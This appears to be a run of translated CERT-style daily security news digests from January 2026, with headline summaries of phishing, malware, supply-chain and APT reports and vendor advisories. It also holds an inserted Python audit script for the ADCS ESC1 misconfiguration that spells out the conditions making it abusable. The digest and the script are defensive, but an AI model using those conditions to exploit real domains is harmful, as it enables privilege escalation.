Hackers over the past six months have relied increasingly more on the browser-in-the-browser (BitB) method to trick users into providing Facebook account credentials.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/facebook-login-thieves-now-u…
∗∗∗ Convincing LinkedIn comment-reply tactic used in new phishing ∗∗∗
---------------------------------------------
Scammers are flooding LinkedIn posts with fake "reply" comments that appear to come from the platform, warning of bogus policy violations and urging users to click external links. Some even abuse LinkedIn's official lnkd.in shortener, making the phishing attempts harder to spot.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/convincing-linkedin-comment-…
∗∗∗ What we know about Iran’s Internet shutdown ∗∗∗
---------------------------------------------
Cloudflare Radar data shows Internet traffic from Iran has effectively dropped to zero since January 8, signaling a complete shutdown in the country and disconnection from the global Internet.
---------------------------------------------
https://blog.cloudflare.com/iran-protests-internet-shutdown/
∗∗∗ GoBruteforcer Botnet Targets 50K-plus Linux Servers ∗∗∗
---------------------------------------------
Researchers detailed a souped-up version of the GoBruteforcer botnet that preys on servers with weak credentials and AI-generated configurations.
---------------------------------------------
https://www.darkreading.com/threat-intelligence/gobruteforcer-botnet-target…
∗∗∗ 10-point paper: BDEW calls for measures to protect critical infrastructure ∗∗∗
---------------------------------------------
In a position paper, the Bundesverband der Energie- und Wasserwirtschaft (German Association of Energy and Water Industries) calls for strengthening the resilience of critical infrastructures.
---------------------------------------------
https://www.golem.de/news/10-punkte-papier-bdew-fordert-massnahmen-zum-schu…
∗∗∗ n8n Supply Chain Attack Abuses Community Nodes to Steal OAuth Tokens ∗∗∗
---------------------------------------------
Threat actors have been observed uploading a set of eight packages to the npm registry that masqueraded as integrations for the n8n workflow automation platform in order to steal developers' OAuth credentials.
---------------------------------------------
https://thehackernews.com/2026/01/n8n-supply-chain-attack-abuses.html
∗∗∗ New Malware Campaign Delivers Remcos RAT Through Multi-Stage Windows Attack ∗∗∗
---------------------------------------------
Cybersecurity researchers have disclosed details of a new campaign dubbed SHADOW#REACTOR that employs an evasive multi-stage attack chain to deliver a commercially available remote administration tool called Remcos RAT and establish persistent, covert remote access.
---------------------------------------------
https://thehackernews.com/2026/01/new-malware-campaign-delivers-remcos.html
∗∗∗ New Advanced Linux VoidLink Malware Targets Cloud and container Environments ∗∗∗
---------------------------------------------
Cybersecurity researchers have disclosed details of a previously undocumented and feature-rich malware framework codenamed VoidLink that's specifically designed for long-term, stealthy access to Linux-based cloud environments.
---------------------------------------------
https://thehackernews.com/2026/01/new-advanced-linux-voidlink-malware.html
∗∗∗ Businesses in 2026: Maybe we should finally look into that AI security stuff ∗∗∗
---------------------------------------------
Survey finds security checks nearly doubled in a year as leaders wise up. The number of organizations that have implemented methods for identifying security risks in the AI tools they use has almost doubled in the space of a year.
---------------------------------------------
https://www.theregister.com/2026/01/12/ai_security_wef_survey/
∗∗∗ Mandiant open sources tool to prevent leaky Salesforce misconfigs ∗∗∗
---------------------------------------------
AuraInspector automates the most common abuses and generates fixes for customers. Mandiant has released an open source tool to help Salesforce admins detect misconfigurations that could expose sensitive data.
---------------------------------------------
https://www.theregister.com/2026/01/13/mandiant_salesforce_tool/
∗∗∗ Dutch cops cuff alleged AVCheck malware kingpin in Amsterdam ∗∗∗
---------------------------------------------
The 33-year-old was under surveillance for some time before returning home from the UAE. Dutch police believe they have arrested a man behind the AVCheck online platform, a service used by cybercriminals that Operation Endgame shuttered in May.
---------------------------------------------
https://www.theregister.com/2026/01/13/avcheck_arrest/
∗∗∗ Start of the first ESC ticket wave: beware of dubious offers! ∗∗∗
---------------------------------------------
The time has finally come: the presale for the Eurovision Song Contest 2026 has begun! But fans should be especially careful, because dubious sellers are trying to profit outside the official sales platforms.
---------------------------------------------
https://www.watchlist-internet.at/news/start-der-ersten-esc-ticketwelle-vor…
∗∗∗ New phishing wave: outstanding payments to the tax office ∗∗∗
---------------------------------------------
Once again, criminals are posing as the Bundesministerium für Finanzen (Austrian Federal Ministry of Finance). They are currently targeting both private individuals and companies. In both cases, allegedly outstanding payments are to be settled by bank transfer to an account abroad.
---------------------------------------------
https://www.watchlist-internet.at/news/phishing-ausstehende-zahlungen-finan…
∗∗∗ Latin America Sees Sharpest Rise in Cyber Attacks in December 2025 as Ransomware Activity Accelerates ∗∗∗
---------------------------------------------
In December 2025, organizations experienced an average of 2,027 cyber attacks per organization per week. This represents a 1% month-over-month increase and a 9% year-over-year increase. While overall growth remained moderate, Latin America recorded the sharpest regional increase, with organizations experiencing an average of 3,065 attacks per week, a 26% increase year over year.
---------------------------------------------
https://blog.checkpoint.com/research/latin-america-sees-sharpest-rise-in-cy…
∗∗∗ VoidLink: The Cloud-Native Malware Framework Weaponizing Linux Infrastructure ∗∗∗
---------------------------------------------
Key Points: VoidLink is a cloud-native Linux malware framework built to maintain long-term, stealthy access to cloud infrastructure rather than targeting individual endpoints. It reflects a shift in attacker focus away from Windows systems toward the Linux environments that power cloud services and critical operations. Its modular, plug-in-driven design allows threat actors to customize capabilities over time, expanding attacks quietly as objectives evolve.
---------------------------------------------
https://blog.checkpoint.com/research/voidlink-the-cloud-native-malware-fram…
∗∗∗ Sweden detains ex-military IT consultant suspected of spying for Russia ∗∗∗
---------------------------------------------
A 33-year-old former IT consultant for Sweden’s Armed Forces has been detained on suspicions of spying for Russian intelligence, Swedish prosecutors said.
---------------------------------------------
https://therecord.media/sweden-detains-it-consultant-russia
∗∗∗ 0patch micropatch for CredSSP vulnerability CVE-2025-47987 ∗∗∗
---------------------------------------------
A short addendum from last week, ahead of the January 2026 Patch Tuesday. ACROS Security has released a 0patch micropatch for an Elevation of Privilege (EoP) vulnerability, CVE-2025-47987, in the Credential Security Support Provider Protocol (CredSSP).
---------------------------------------------
https://borncity.com/blog/2026/01/13/0patch-micropatch-fuer-credssp-schwach…
∗∗∗ End of support for Microsoft products in 2026 ∗∗∗
---------------------------------------------
2026 brings users of Microsoft products several dates on which support ends. These range from various Windows versions that will no longer receive updates to Microsoft Office 2021.
---------------------------------------------
https://borncity.com/blog/2026/01/13/end-of-support-fuer-microsoft-produkte…
∗∗∗ Russian BlueDelta (Fancy Bear) Uses PDFs to Steal Logins in Just 2 Seconds ∗∗∗
---------------------------------------------
New research from Recorded Future reveals how Russian state hackers (BlueDelta) are using fake Microsoft and Google login portals to steal credentials. The campaign involves using legitimate PDF lures from GRC and EcoClimate to trick victims.
---------------------------------------------
https://hackread.com/russian-bluedelta-fancy-bear-pdfs-steal-login/
∗∗∗ Widespread Magecart Campaign Targets Users of All Major Credit Cards ∗∗∗
---------------------------------------------
Researchers at Silent Push have exposed a global Magecart campaign stealing credit card data since 2022. Learn how this invisible web-skimming attack targets major networks like Mastercard and Amex, and how to stay safe.
---------------------------------------------
https://hackread.com/magecart-targets-all-credit-cards-users/
∗∗∗ K7 Antivirus: Named pipe abuse, registry manipulation and privilege escalation (CVE-2025-67826) ∗∗∗
---------------------------------------------
When hunting for privilege escalation vulnerabilities, named pipes are a goldmine. Antivirus products often use named pipes to allow unprivileged users to trigger privileged operations, making them especially promising targets for this class of vulnerability.
---------------------------------------------
http://blog.quarkslab.com/k7-antivirus-named-pipe-abuse-registry-manipulati…
∗∗∗ How GitHub could secure npm ∗∗∗
---------------------------------------------
In 2025, npm experienced an unprecedented number of compromised packages in a series of coordinated attacks on the JavaScript open source supply chain. These packages ranged from crypto-stealing malware to credential-stealing exploits. While GitHub announced changes to address these attacks, many maintainers (myself included) found the response insufficient.
---------------------------------------------
https://humanwhocodes.com/blog/2026/01/how-github-could-secure-npm/
∗∗∗ Shai Hulud 2.0 Campaign ∗∗∗
---------------------------------------------
Shai-Hulud 2.0 represents one of the most severe supply chain compromises observed in the modern cloud-native ecosystem.
The campaign involved the manipulation of hundreds of publicly available packages and specifically targeted developer workstations, CI/CD pipelines, and cloud workloads to harvest credentials and sensitive configuration data.
---------------------------------------------
https://detect.fyi/shai-hulud-2-0-campaign-be390e502f28?source=rss----d5fd8…
∗∗∗ Malicious Chrome Extension Steals MEXC API Keys for Account Takeover ∗∗∗
---------------------------------------------
Socket’s Threat Research Team identified a malicious Chrome extension, MEXC API Automator, published to the Chrome Web Store on September 1, 2025, by a threat actor under the alias jorjortan142.
---------------------------------------------
https://socket.dev/blog/malicious-chrome-extension-steals-mexc-api-keys?utm…
∗∗∗ Fixing ESC1 - Enrollee supplies subject and template allows client authentication ∗∗∗
---------------------------------------------
ADCS misconfigurations are one of the most common privilege escalation vectors we encounter. This article covers steps to remediate ESC1 flaws.
---------------------------------------------
https://projectblack.io/blog/fixing-esc1-enrollee-supplies-subject-and-temp…
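The following is an added example, not code from the Project Black article. It audits certificate-template attributes for the ESC1 combination named in the title (enrollee supplies the subject, template allows client authentication, no manager approval, no authorized signatures, low-privileged enrollment rights) and shows the two ways the remediation can break that combination. The LDAP attribute names and flag bits are the documented ones from MS-CRTD; the `enroll_sids` field and the sample templates are constructed for the example, and it is assumed the caller has already resolved the "Enroll" extended right from nTSecurityDescriptor into principal SIDs (that ACL parsing is not shown).

```python
"""
Audit ADCS certificate templates for the ESC1 condition and show the
remediated attributes. Added example; not code from the linked article.

Each template is a dict shaped like the LDAP attributes of an object under
CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,
plus one pre-resolved field, "enroll_sids": the SIDs that hold the "Enroll"
extended right on the template (assumption: resolved by the caller).
"""

# Documented flag bits (MS-CRTD).
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag: CA manager approval

# EKUs that let the issued certificate authenticate a principal to AD.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}

# Principals that mean "any low-privileged account": well-known SIDs and domain RIDs.
LOW_PRIV_SIDS = {"S-1-1-0", "S-1-5-11"}  # Everyone, Authenticated Users
LOW_PRIV_RIDS = {"513", "515", "545"}    # Domain Users, Domain Computers, Users


def is_low_priv(sid: str) -> bool:
    return sid in LOW_PRIV_SIDS or sid.rsplit("-", 1)[-1] in LOW_PRIV_RIDS


def esc1_findings(template: dict) -> list:
    """Return the ESC1 conditions the template satisfies, or [] if any one
    of them is missing (all five must hold for the abuse to work)."""
    ekus = set(template.get("pKIExtendedKeyUsage", []))
    low = [s for s in template["enroll_sids"] if is_low_priv(s)]
    conditions = [
        (bool(template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
         "enrollee supplies subject (SAN may name any principal)"),
        # An empty EKU set also permits authentication, so treat it as authenticating.
        (not ekus or bool(ekus & AUTH_EKUS),
         "template permits client authentication"),
        (not template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS,
         "no CA manager approval required"),
        (template.get("msPKI-RA-Signature", 0) == 0,
         "no authorized signatures required"),
        (bool(low), "low-privileged principals can enroll: " + ", ".join(low)),
    ]
    return [msg for ok, msg in conditions] if all(ok for ok, _ in conditions) else []


def remediate_esc1(template: dict, *, require_approval: bool = False) -> dict:
    """Return a copy with the ESC1 chain broken. Default: clear
    ENROLLEE_SUPPLIES_SUBJECT so the CA builds the subject from AD;
    alternatively require CA manager approval for every request."""
    fixed = dict(template)
    if require_approval:
        fixed["msPKI-Enrollment-Flag"] = template["msPKI-Enrollment-Flag"] | CT_FLAG_PEND_ALL_REQUESTS
    else:
        fixed["msPKI-Certificate-Name-Flag"] = (
            template["msPKI-Certificate-Name-Flag"] & ~CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
        )
    return fixed


def audit(templates: list) -> dict:
    """Map template name -> ESC1 findings for every vulnerable template."""
    return {t["cn"]: esc1_findings(t) for t in templates if esc1_findings(t)}


# Constructed sample data (not from a real domain); SIDs are made up.
DOMAIN = "S-1-5-21-1004336348-1177238915-682003330"
SAMPLE_TEMPLATES = [
    {   # classic ESC1: Domain Users enroll and pick their own SAN
        "cn": "VulnWebServer",
        "msPKI-Certificate-Name-Flag": 0x1,
        "msPKI-Enrollment-Flag": 0x0,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1", "1.3.6.1.5.5.7.3.2"],
        "enroll_sids": [DOMAIN + "-513"],
    },
    {   # subject built from AD, so not ESC1 although Domain Users can enroll
        "cn": "User",
        "msPKI-Certificate-Name-Flag": 0xA6000000,
        "msPKI-Enrollment-Flag": 0x29,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"],
        "enroll_sids": [DOMAIN + "-513"],
    },
    {   # enrollee supplies subject, but only Domain Admins (RID 512) can enroll
        "cn": "AdminOnlyAgent",
        "msPKI-Certificate-Name-Flag": 0x1,
        "msPKI-Enrollment-Flag": 0x0,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": [],
        "enroll_sids": [DOMAIN + "-512"],
    },
]

if __name__ == "__main__":
    for name, reasons in audit(SAMPLE_TEMPLATES).items():
        print(f"[ESC1] {name}")
        for r in reasons:
            print("   -", r)
```

Against the constructed data only `VulnWebServer` is reported; clearing the name flag or turning on manager approval on that template makes `esc1_findings` return an empty list, which is the state the remediation aims for. In a real audit the `enroll_sids` list must come from the template's DACL, and the same check should be repeated for the CA's own enrollment permissions.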
∗∗∗ Lack of isolation in agentic browsers resurfaces old vulnerabilities ∗∗∗
---------------------------------------------
With browser-embedded AI agents, we’re essentially starting the security journey over again. We exploited a lack of isolation mechanisms in multiple agentic browsers to perform attacks ranging from the dissemination of false information to cross-site data leaks.
---------------------------------------------
https://blog.trailofbits.com/2026/01/13/lack-of-isolation-in-agentic-browse…
=====================
= Vulnerabilities =
=====================
∗∗∗ Unauthenticated access to local configuration ∗∗∗
---------------------------------------------
CVSSv3 Score: 9.3. An exposure of sensitive information to an unauthorized actor [CWE-200] vulnerability in FortiFone Web Portal page may allow an unauthenticated attacker to obtain the device configuration via crafted HTTP or HTTPS requests.
---------------------------------------------
https://fortiguard.fortinet.com/psirt/FG-IR-25-260
∗∗∗ Unauthenticated remote command injection ∗∗∗
---------------------------------------------
CVSSv3 Score: 9.4. An improper neutralization of special elements used in an OS command (OS Command Injection) vulnerability [CWE-78] in FortiSIEM may allow an unauthenticated attacker to execute unauthorized code or commands via crafted TCP requests.
---------------------------------------------
https://fortiguard.fortinet.com/psirt/FG-IR-25-772
∗∗∗ SAP Security Patch Day January 2026 ∗∗∗
---------------------------------------------
SAP has released its January 2026 security patch package containing 17 security notes addressing critical vulnerabilities across enterprise SAP environments. This release includes four HotNews vulnerabilities with CVSS ratings up to 9.9, four High priority issues, seven Medium priority fixes, and two Low priority updates. The patches affect SAP S/4HANA, SAP HANA database, SAP NetWeaver, SAP Wily Introscope, and various application components.
---------------------------------------------
https://redrays.io/blog/sap-security-patch-day-january-2026/
∗∗∗ TinyWeb: Windows web server allows code injection ∗∗∗
---------------------------------------------
Attackers on the network can inject arbitrary code into the lightweight TinyWeb web server for Windows. An update fixes the issue.
---------------------------------------------
https://www.heise.de/news/TinyWeb-Windows-Web-Server-ermoeglicht-Codeschmug…
∗∗∗ TYPO3-CORE-SA-2026-003: Broken Access Control in Recycler Module ∗∗∗
---------------------------------------------
It has been discovered that TYPO3 CMS is susceptible to broken access control.
---------------------------------------------
https://typo3.org/security/advisory/typo3-core-sa-2026-003
∗∗∗ ServiceNow Patches Critical AI Platform Flaw Allowing Unauthenticated User Impersonation ∗∗∗
---------------------------------------------
ServiceNow has disclosed details of a now-patched critical security flaw impacting its ServiceNow AI Platform that could enable an unauthenticated user to impersonate another user and perform arbitrary actions as that user. The vulnerability, tracked as CVE-2025-12420, carries a CVSS score of 9.3 out of 10.0.
---------------------------------------------
https://thehackernews.com/2026/01/servicenow-patches-critical-ai-platform.h…
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (mariadb10.11, mariadb:10.11, mariadb:10.3, mariadb:10.5, and tar), Debian (net-snmp), Fedora (coturn, NetworkManager-l2tp, openssh, and tuxanci), Mageia (libtasn1), Oracle (buildah, cups, httpd, kernel, libpq, libsoup, libsoup3, mariadb:10.11, mariadb:10.3, openssl, and podman), SUSE (cpp-httplib, ImageMagick, libtasn1, python-cbor2, util-linux, valkey, and wget2), and Ubuntu (google-guest-agent, linux-iot, and python-urllib3).
---------------------------------------------
https://lwn.net/Articles/1053988/
∗∗∗ Remote Code Execution With Modern AI/ML Formats and Libraries ∗∗∗
---------------------------------------------
We identified remote code execution vulnerabilities in open-source AI/ML libraries published by Apple, Salesforce and NVIDIA.
---------------------------------------------
https://unit42.paloaltonetworks.com/rce-vulnerabilities-in-ai-python-librar…
∗∗∗ YoSmart YoLink Smart Hub ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-26-013-03
∗∗∗ Rockwell Automation FactoryTalk DataMosaix Private Cloud ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-26-013-02
∗∗∗ Rockwell Automation 432ES-IG3 Series A ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-26-013-01
∗∗∗ Security Vulnerabilities fixed in Firefox 147 ∗∗∗
---------------------------------------------
https://www.mozilla.org/en-US/security/advisories/mfsa2026-01/
=====================
= End-of-Day report =
=====================
Timeframe: Friday 09-01-2026 18:00 − Monday 12-01-2026 18:00
Handler: Felician Fuchs
Co-Handler: Alexander Riepl
=====================
= News =
=====================
∗∗∗ Max severity Ni8mare flaw impacts nearly 60,000 n8n instances ∗∗∗
---------------------------------------------
Nearly 60,000 n8n instances exposed online remain unpatched against a maximum-severity vulnerability dubbed "Ni8mare."
---------------------------------------------
https://www.bleepingcomputer.com/news/security/max-severity-ni8mare-flaw-im…
∗∗∗ Spanish energy giant Endesa discloses data breach affecting customers ∗∗∗
---------------------------------------------
Spanish energy provider Endesa and its Energía XXI operator are notifying customers that hackers accessed the company's systems and obtained contract-related information, which includes personal details.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/spanish-energy-giant-endesa-…
∗∗∗ Hidden Telegram proxy links can reveal your IP address in one click ∗∗∗
---------------------------------------------
A single click on what may appear to be a Telegram username or harmless link is all it takes to expose your real IP address to attackers, due to how proxy links are handled. Telegram says it will add warnings to proxy links after researchers demonstrated that such one-click interactions could reveal a Telegram user's real IP address.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hidden-telegram-proxy-links-…
∗∗∗ Illicit Crypto Economy Surges Amid Increased Nation-State Activity ∗∗∗
---------------------------------------------
Cybercriminal cryptocurrency transactions totaled billions in 2025, with activity from sanctioned countries like Russia and Iran causing the largest jump.
---------------------------------------------
https://www.darkreading.com/cyber-risk/illicit-crypto-economy-surges-nation…
∗∗∗ Russia’s Fancy Bear APT Doubles Down on Global Secrets Theft ∗∗∗
---------------------------------------------
The notorious state-sponsored group relies on basic techniques that are highly effective, often delivering greater ROI than more complex malware-heavy operations.
---------------------------------------------
https://www.darkreading.com/cyberattacks-data-breaches/russian-apt-credenti…
∗∗∗ Two Separate Campaigns Target Exposed LLM Services ∗∗∗
---------------------------------------------
A total of 91,403 sessions targeted public LLM endpoints to find leaks in organizations' use of AI and map an expanding attack surface.
---------------------------------------------
https://www.darkreading.com/endpoint-security/separate-campaigns-target-exp…
∗∗∗ Cybersecurity Act: EU Commission wants a hard ban on Huawei ∗∗∗
---------------------------------------------
The EU Commission now wants to make previously voluntary restrictions on Chinese equipment suppliers mandatory. This is highly controversial within the EU and appears out of step with the times.
---------------------------------------------
https://www.golem.de/news/cybersecurity-act-eu-kommission-will-hartes-verbo…
∗∗∗ Payslips sent to the wrong recipients: GDPR incident at Datev ∗∗∗
---------------------------------------------
After a technical fault in Datev's payroll processing, customer data ended up in the wrong hands. The trigger was, of all things, an attempt to fix the problem.
---------------------------------------------
https://www.golem.de/news/lohnabrechnungen-falsch-verschickt-dsgvo-vorfall-…
∗∗∗ Researchers Uncover Service Providers Fueling Industrial-Scale Pig Butchering Fraud ∗∗∗
---------------------------------------------
Cybersecurity researchers have shed light on two service providers that supply online criminal networks with the necessary tools and infrastructure to fuel the pig butchering-as-a-service (PBaaS) economy.
---------------------------------------------
https://thehackernews.com/2026/01/researchers-uncover-service-providers.html
∗∗∗ GoBruteforcer Botnet Targets Crypto Project Databases by Exploiting Weak Credentials ∗∗∗
---------------------------------------------
A new wave of GoBruteforcer attacks has targeted databases of cryptocurrency and blockchain projects to co-opt them into a botnet thats capable of brute-forcing user passwords for services such as FTP, MySQL, PostgreSQL, and phpMyAdmin on Linux servers.
---------------------------------------------
https://thehackernews.com/2026/01/gobruteforcer-botnet-targets-crypto.html
∗∗∗ UK government exempting itself from flagship cyber law inspires little confidence ∗∗∗
---------------------------------------------
Ministers promise equivalent standards, just without the legal obligation. ANALYSIS: From May's cyberattack on the Legal Aid Agency to the Foreign Office breach months later, cyber incidents have become increasingly common in UK government.
---------------------------------------------
https://www.theregister.com/2026/01/10/csr_bill_analysis/
∗∗∗ Instagram data leak: data from 6.2 million accounts at Have I Been Pwned ∗∗∗
---------------------------------------------
Data from 6.2 million Instagram users has ended up at the Have I Been Pwned project.
---------------------------------------------
https://www.heise.de/news/Instagram-6-2-Millionen-Nutzerdaten-mittels-Scrap…
∗∗∗ ÖIAT focus survey reveals massive presence of subscription traps in Google ads ∗∗∗
---------------------------------------------
In an in-depth analysis of the Google Ads Library, the Österreichisches Institut für angewandte Telekommunikation (ÖIAT) discovered a large number of dangerous ads. In total, well over 27,000 problematic advertisements served as bait for subscription traps. Google has so far not responded to complaints.
---------------------------------------------
https://www.watchlist-internet.at/news/schwerpunkterhebung-abo-fallen-googl…
∗∗∗ Basketball player arrested for alleged ransomware ties freed in Russia-France prisoner swap ∗∗∗
---------------------------------------------
Daniil Kasatkin, 26, was seen in a video shared by Russian state news outlet TASS emerging from a plane that was then used to send French researcher Laurent Vinatier back to France.
---------------------------------------------
https://therecord.media/france-frees-russian-basketball-player-ransomware-s…
∗∗∗ MC1215070: MFA mandatory for the Microsoft 365 Admin Center from Feb. 2026 ∗∗∗
---------------------------------------------
A brief note for administrators of Microsoft 365 tenants. For security reasons, Microsoft will enforce multi-factor authentication (MFA) for administrator sign-in to the Microsoft 365 Admin Center from 9 February 2026. Without appropriate measures, sign-in will then fail.
---------------------------------------------
https://borncity.com/blog/2026/01/11/mc1215070-mfa-fuer-microsoft-365-admin…
∗∗∗ Database of 323,986 BreachForums Users Leaked as Admin Disputes Scope ∗∗∗
---------------------------------------------
Database of 323,986 BreachForums users leaked online as forum admins claim the exposed data is partial and dates back to August 2025.
---------------------------------------------
https://hackread.com/breachforums-database-users-leak-admin-disputes/
∗∗∗ Everest Ransomware Claims Breach at Nissan, Says 900GB of Data Stolen ∗∗∗
---------------------------------------------
Everest ransomware claims to have breached Nissan Motor Corporation, alleging the theft of 900GB of internal data, including documents and screenshots.
---------------------------------------------
https://hackread.com/everest-ransomware-nissan-data-breach/
∗∗∗ How Safe is the Rust Ecosystem? A Deep Dive into crates.io ∗∗∗
---------------------------------------------
The relentless wave of high-impact supply chain attacks throughout 2025—most notably the major incident within npm [..] —suggests this trend is far from peaking. In fact, with the rapid adoption of AI and LLMs in development workflows, we are likely facing an acceleration of these threats rather than a decline, in my opinion.
---------------------------------------------
https://mr-leshiy-blog.web.app/blog/crates_io_analysis/
∗∗∗ Detection of Kerberos Golden Ticket Attacks via Velociraptor ∗∗∗
---------------------------------------------
Kerberos is a strange technology. Over the years, I’ve gone through its internal workings again and again, yet parts of it always seem to slip away. It has been a while since I did my OSCP, so inevitably I’ve found myself back in this topic to refresh my knowledge.
---------------------------------------------
https://detect.fyi/detection-of-kerberos-golden-ticket-attacks-via-velocira…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security update: Dell laptops with Adreno GPU are vulnerable ∗∗∗
---------------------------------------------
The driver for Qualcomm's Adreno GPU has security holes and endangers various Dell laptops. A fixed driver is available for download.
---------------------------------------------
https://www.heise.de/news/Sicherheitsupdate-Dell-Laptops-mit-Adreno-GPU-sin…
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (chromium and sogo), Fedora (chromium, foomuuri, libpng, libsodium, mariadb10.11, musescore, nginx, python-pdfminer, python-urllib3, python3.12, seamonkey, wasmedge, and wget2), Mageia (curl, libpcap, sodium, wget2, and zlib), Slackware (lcms2), SUSE (chromedriver, chromium, noopenh264, coredns, curl, dcmtk, fontforge, gdk-pixbuf-loader-libheif, gimp, kernel, libheif, libpng16, libsoup-2_4-1, libvirt, mariadb, php8, poppler, python-filelock, python-tornado6, python311-aiohttp, qemu, sssd, and traefik), and Ubuntu (libheif, libtasn1-6, linux-azure-nvidia, linux-kvm, linux-raspi, linux-raspi-realtime, and php7.2, php7.4, php8.1, php8.3, php8.4).
---------------------------------------------
https://lwn.net/Articles/1053820/
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 08-01-2026 18:00 − Friday 09-01-2026 18:00
Handler: Felician Fuchs
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ VMware ESXi zero-days likely exploited a year before disclosure ∗∗∗
---------------------------------------------
Chinese-speaking threat actors used a compromised SonicWall VPN appliance to deliver a VMware ESXi exploit toolkit that seems to have been developed more than a year before the targeted vulnerabilities became publicly known.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/vmware-esxi-zero-days-likely…
∗∗∗ FBI warns about Kimsuky hackers using QR codes to phish U.S. orgs ∗∗∗
---------------------------------------------
The North Korean state-sponsored hacker group Kimsuky is using malicious QR codes in spearphishing campaigns that target U.S. organizations, the Federal Bureau of Investigation warns in a flash alert.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/fbi-warns-about-kimsuky-hack…
∗∗∗ New China-linked hackers breach telcos using edge device exploits ∗∗∗
---------------------------------------------
A sophisticated threat actor that uses Linux-based malware to target telecommunications providers has recently broadened its operations to include organizations in Southeastern Europe.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-china-linked-hackers-bre…
∗∗∗ Defeating KASLR by Doing Nothing at All ∗∗∗
---------------------------------------------
I’ve recently been researching Pixel kernel exploitation and as part of this research I found myself with an excellent arbitrary write primitive…but without a KASLR leak. As necessity is the mother of all invention, on a hunch, I started researching the Linux kernel linear mapping.
---------------------------------------------
https://projectzero.google/2025/11/defeating-kaslr-by-doing-nothing-at-all.…
∗∗∗ Google Sees Spam, You See Your Site: A Cloaked SEO Spam Attack ∗∗∗
---------------------------------------------
We recently handled a case where a customer reported strange SEO behavior on their website. Regular visitors saw a normal site. No popups. No redirects. No visible spam. However, when they checked their site on Google, the search results were flooded with eBay-type-looking websites and “Situs Toto” gambling spam. This is a professional-grade SEO cloaking attack.
---------------------------------------------
https://blog.sucuri.net/2026/01/google-sees-spam-you-see-your-site-a-cloake…
∗∗∗ Russian APT28 Runs Credential-Stealing Campaign Targeting Energy and Policy Organizations ∗∗∗
---------------------------------------------
Russian state-sponsored threat actors have been linked to a fresh set of credential harvesting attacks targeting individuals associated with a Turkish energy and nuclear research agency, as well as staff affiliated with a European think tank and organizations in North Macedonia and Uzbekistan.
---------------------------------------------
https://thehackernews.com/2026/01/russian-apt28-runs-credential-stealing.ht…
∗∗∗ Auslegungssache 150: On the trail of digital evidence ∗∗∗
---------------------------------------------
In the c't data protection podcast, an IT forensic investigator explains how she secures evidence after incidents, negotiates with extortionists and keeps data protection in view.
---------------------------------------------
https://www.heise.de/hintergrund/Auslegungssache-150-Auf-digitaler-Spurensu…
∗∗∗ From Munich to Seville: international strike against the "Black Axe" cyber mafia ∗∗∗
---------------------------------------------
In Spain, investigators dealt a painful blow to the Nigerian cyber mafia known as "Black Axe".
---------------------------------------------
https://www.heise.de/news/Von-Muenchen-bis-Sevilla-Internationaler-Schlag-g…
∗∗∗ Who Benefited from the Aisuru and Kimwolf Botnets? ∗∗∗
---------------------------------------------
Our first story of 2026 revealed how a destructive new botnet called Kimwolf rapidly grew to infect more than two million devices by mass-compromising a vast number of unofficial Android TV streaming boxes. Today, we'll dig through digital clues left behind by the hackers, network operators, and cybercrime services that appear to have benefitted from Kimwolf's spread.
---------------------------------------------
https://krebsonsecurity.com/2026/01/who-benefited-from-the-aisuru-and-kimwo…
∗∗∗ CPPA fines data broker selling lists of Alzheimer's patients ∗∗∗
---------------------------------------------
Datamasters bought and resold the names, addresses, phone numbers and email addresses of millions of people with Alzheimer’s disease, drug addiction, bladder incontinence and other medical conditions for targeted advertising, according to the CPPA.
---------------------------------------------
https://therecord.media/ccpa-fines-data-broker-selling-lists-alzheimers
∗∗∗ Russian Hacktivists hack CCTV Cameras in Denmark ∗∗∗
---------------------------------------------
The hacktivists had recorded part of the video stream from the CCTV as proof of the hack and published it. It was reported that no individuals were identifiable on the recording.
---------------------------------------------
https://www.truesec.com/hub/blog/russian-hacktivists-hack-cctv-cameras-in-d…
∗∗∗ CISCO switches stuck in boot loops because of DNS error ∗∗∗
---------------------------------------------
Administrators worldwide are apparently struggling with certain switches from the manufacturer CISCO being caught in a restart loop (boot loop). This occurs after the devices have logged a DNS client error.
---------------------------------------------
https://borncity.com/blog/2026/01/09/cisco-switches-gehen-wegen-dns-fehler-…
∗∗∗ Hacker Behind Wired.com Leak Now Selling Full 40M Condé Nast Records ∗∗∗
---------------------------------------------
A hacker claims to be selling nearly 40 million Condé Nast user records after leaking Wired.com data, with multiple major brands allegedly affected.
---------------------------------------------
https://hackread.com/wired-com-hacker-data-leak-conde-nast-records/
∗∗∗ Threat Actors Actively Targeting LLMs ∗∗∗
---------------------------------------------
